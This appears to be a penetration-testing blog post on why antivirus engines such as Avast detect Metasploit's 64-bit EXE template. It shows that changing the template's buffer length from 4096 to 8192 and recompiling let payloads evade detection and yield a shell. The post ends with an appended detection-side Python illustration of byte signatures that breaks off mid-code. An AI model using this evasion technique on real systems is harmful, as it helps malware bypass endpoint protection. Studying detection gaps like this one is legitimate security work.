<div class="s14link" data-reactid=".e.0" id="innercomp_diky1gjplink" style="background: transparent; border: 0px; display: block; height: 186px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 453px;">
<div class="s14img" data-reactid=".e.0.0" data-state="loaded" id="innercomp_diky1gjpimg" style="background: transparent; border: 0px; height: 186px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 453px;">
<img class="s14imgimage" data-reactid=".e.0.0.0" id="innercomp_diky1gjpimgimage" src="http://static.wixstatic.com/media/75fce7_22834eb0b7c845cfbea5f9a27d1430bb.png_srb_p_445_183_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 186px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 453px;" /></div>
</div>
</div>
</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
xkcd: The malware aquarium</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
It is often the case that we want to perform some more thorough testing by using actual malware executables, and perhaps different command and control techniques, during our test. We want to vary our techniques in order to find out where the clipping threshold of defense technologies is set, and to be able to comprehensively report back on which techniques were effective on a system and which were not. In most environments, the most commonly deployed endpoint protection technology is an Antivirus engine. </div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Antivirus has become very effective at detecting off-the-shelf 32-bit malware executables from the Metasploit framework but tends to be lacking in the 64-bit arena. Additionally, we find that network resident defenses are well-tuned to 32-bit second stage payloads from Metasploit but less capable of seeing a 64-bit second stage payload. In my experience, the AV engines are not exclusively looking at the shellcode but also matching on the assembly code that constitutes the stub loader for Metasploit executables generated by the msfvenom command.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
When Metasploit payloads are generated they use a standard template executable in both the 32-bit and 64-bit cases. The standard templates are in the form of precompiled executables in the framework’s data directory. In addition to the templates, the Metasploit project provides a source code directory in the framework.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Focusing specifically on Windows, we can find both the 32-bit template source in C and the 64-bit template source in assembly, both of which are in the “/usr/share/metasploit-framework/data/templates/src/pe/exe” directory on a KALI distribution.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
In both the 32 and 64-bit cases, the template source has a very similar function. It allocates a buffer of 4096 bytes in memory and puts the string “PAYLOAD:” at the beginning of this buffer. The string “PAYLOAD:” is placed into the buffer as a constant that indicates a starting place for “msfvenom” to use when creating a new payload executable.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
That starting place is an address in memory which msfvenom knows can be used to copy shellcode into. The size of the available buffer for shellcode is the allocated buffer size in the template EXE minus eight (the length of the string “PAYLOAD:”). Msfvenom will take the chosen payload, encode it with the appropriate encoder (if specified), and prepend no-operation (NOP) sled bytes if also chosen.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
The final executable in the 32-bit case has been compiled from C source code. In the C source code, the shellcode is called by casting the payload buffer to a pointer to a function (which has no function parameters).</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
The final executable in the 64-bit case has been compiled from assembly code. The assembly code function allocates an executable buffer of memory, copies the shellcode into that memory, and executes it using a CALL instruction. This is very similar to the technique used by many different tools, including the awesome Powershell toys we all use.</div>
<div id="innerContainer_txtMediaw4h" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="228.62903225806448" data-react-checksum="452734963" data-reactid=".f" id="innercomp_txtMediaw4h" style="background: transparent; border: 0px; clear: both; display: block; height: 229px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 350px;" title="">
<div class="s14link" data-reactid=".f.0" id="innercomp_txtMediaw4hlink" style="background: transparent; border: 0px; display: block; height: 229px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 350px;">
<div class="s14img" data-reactid=".f.0.0" data-state="loaded" id="innercomp_txtMediaw4himg" style="background: transparent; border: 0px; height: 229px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 350px;">
<img class="s14imgimage" data-reactid=".f.0.0.0" id="innercomp_txtMediaw4himgimage" src="http://static.wixstatic.com/media/75fce7_174108d3c80c492a8eafb216b4911f6a.png_srb_p_344_225_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 229px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 350px;" /></div>
</div>
</div>
</div>
<div class="font_8" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span>32-bit source code for EXE template</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia1h9h" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="413.6470361619067" data-react-checksum="733622415" data-reactid=".g" id="innercomp_txtMedia1h9h" style="background: transparent; border: 0px; clear: both; display: block; height: 414px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" title="">
<div class="s14link" data-reactid=".g.0" id="innercomp_txtMedia1h9hlink" style="background: transparent; border: 0px; display: block; height: 414px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 629px;">
<div class="s14img" data-reactid=".g.0.0" data-state="loaded" id="innercomp_txtMedia1h9himg" style="background: transparent; border: 0px; height: 414px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 629px;">
<img class="s14imgimage" data-reactid=".g.0.0.0" id="innercomp_txtMedia1h9himgimage" src="http://static.wixstatic.com/media/75fce7_3137854e8d58477c944dfa8bb3f2a5c4.png_srb_p_628_413_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 414px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span>64-bit assembly source code for EXE template</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Armed with this knowledge, I decided to see how one single AV engine (Avast) reacted when I simply took the 64-bit executable template and copied it to a Windows system. Note that I did not even put any shellcode payload into the EXE but only took the template itself.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
It was not really surprising that Avast immediately triggered an alert. Let's face it, matching on the assembly opcodes for the template is a pretty easy way of triggering an alert without having to actually examine the shellcode payload.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMediaxfp" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="255.04838709677418" data-react-checksum="-970575564" data-reactid=".h" id="innercomp_txtMediaxfp" style="background: transparent; border: 0px; clear: both; display: block; height: 256px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 350px;" title="">
<div class="s14link" data-reactid=".h.0" id="innercomp_txtMediaxfplink" style="background: transparent; border: 0px; display: block; height: 256px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 350px;">
<div class="s14img" data-reactid=".h.0.0" data-state="loaded" id="innercomp_txtMediaxfpimg" style="background: transparent; border: 0px; height: 256px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 350px;">
<img class="s14imgimage" data-reactid=".h.0.0.0" id="innercomp_txtMediaxfpimgimage" src="http://static.wixstatic.com/media/75fce7_17a8828c21f94f0891dc290fb96aaa6b.png_srb_p_344_251_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 256px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 350px;" /></div>
</div>
</div>
</div>
<div class="font_8" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span>Avast tells me this is bad!</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Staying focused on the 64-bit case, there is absolutely no reason why I cannot recompile this assembly code and modify it as much or as little as I want to. We only need to make sure that, at some point, it calls the two required bits of code to copy the payload into an executable memory segment we allocated and then executes it.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Case 1:</span> For my first level of fun, I simply recompiled the same source assembly code. Not surprisingly, Avast flagged this.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Case 2:</span> I changed the buffer length to 8192 bytes, and recompiled. Nothing other than the buffer length was changed. Avast completely failed this test by not flagging a single alert. How do I know? Well, I compiled it on the system that Avast was also running on. Note that the instructions for compiling the assembly code are helpfully listed in the comments of the source code.</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia11pu" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="101.61290322580646" data-react-checksum="500445445" data-reactid=".i" id="innercomp_txtMedia11pu" style="background: transparent; border: 0px; clear: both; display: block; height: 102px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 238px;" title="">
<div class="s14link" data-reactid=".i.0" id="innercomp_txtMedia11pulink" style="background: transparent; border: 0px; display: block; height: 102px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 238px;">
<div class="s14img" data-reactid=".i.0.0" data-state="loaded" id="innercomp_txtMedia11puimg" style="background: transparent; border: 0px; height: 102px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 238px;">
<img class="s14imgimage" data-reactid=".i.0.0.0" id="innercomp_txtMedia11puimgimage" src="http://static.wixstatic.com/media/75fce7_57c1c8b6b3c64fcaa636cc73a39140f3.png_srb_p_234_100_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 102px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 238px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Last section of x64 assembly listing</div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 13px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Case 3:</span> I modified all of the values in the assembly code to 8192, then took my newly generated executable template and created two different payloads with it. One of the payloads used the 64-bit XOR encoding on the shellcode, while the other used no encoding at all.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
I then copied the payload files to my Windows 7 machine running Avast. I forced Avast to scan them, and they passed with flying colors! Then I executed them and shell was mine.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
With case 3, I was particularly amused at Avast’s DEEP SCAN, which seemed to indicate that it was looking really hard at what was going on! But then, it told me that all was fine and the malware was happily executed.</div>
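What Case 2 and Case 3 above show is a signature that keyed on the literal bytes of one build, so a single changed immediate was enough to fall outside it. The Python below is an added illustration written from the detection side; it is not the post's assembly listing, not the template's code, and not a description of how Avast's engine actually works. The byte strings are constructed stand-ins (labelled as such in the code): an x86-64 <code>mov edx, imm32</code> between two fixed instructions, once with the original 0x1000 immediate and once with 8192 (0x2000). It contrasts an exact-bytes signature, which misses the modified build, with a masked signature that wildcards the operand and also recovers the buffer length that was used. The offsets, names and sample bytes are assumptions made for the example.

```python
"""Exact vs. masked byte signatures on a stub whose buffer-length immediate changed.

Added illustration; not the post's listing and not any vendor's detection logic.
All byte strings below are constructed for this example.
"""
from typing import List, Optional, Tuple

MaskedSig = List[Tuple[int, int]]  # (expected byte, mask); mask 0x00 means "any value"

# Constructed samples: mov rbp,rsp ; mov edx,<len> (opcode 0xBA + LE imm32) ; call rel32
ORIGINAL_STUB = bytes.fromhex("4889e5" "ba00100000" "e800000000")  # imm32 = 0x1000
MODIFIED_STUB = bytes.fromhex("4889e5" "ba00200000" "e800000000")  # imm32 = 0x2000 (8192)
# Constructed benign stream with no such sequence: push rbp; mov rbp,rsp; xor eax,eax; pop rbp; ret
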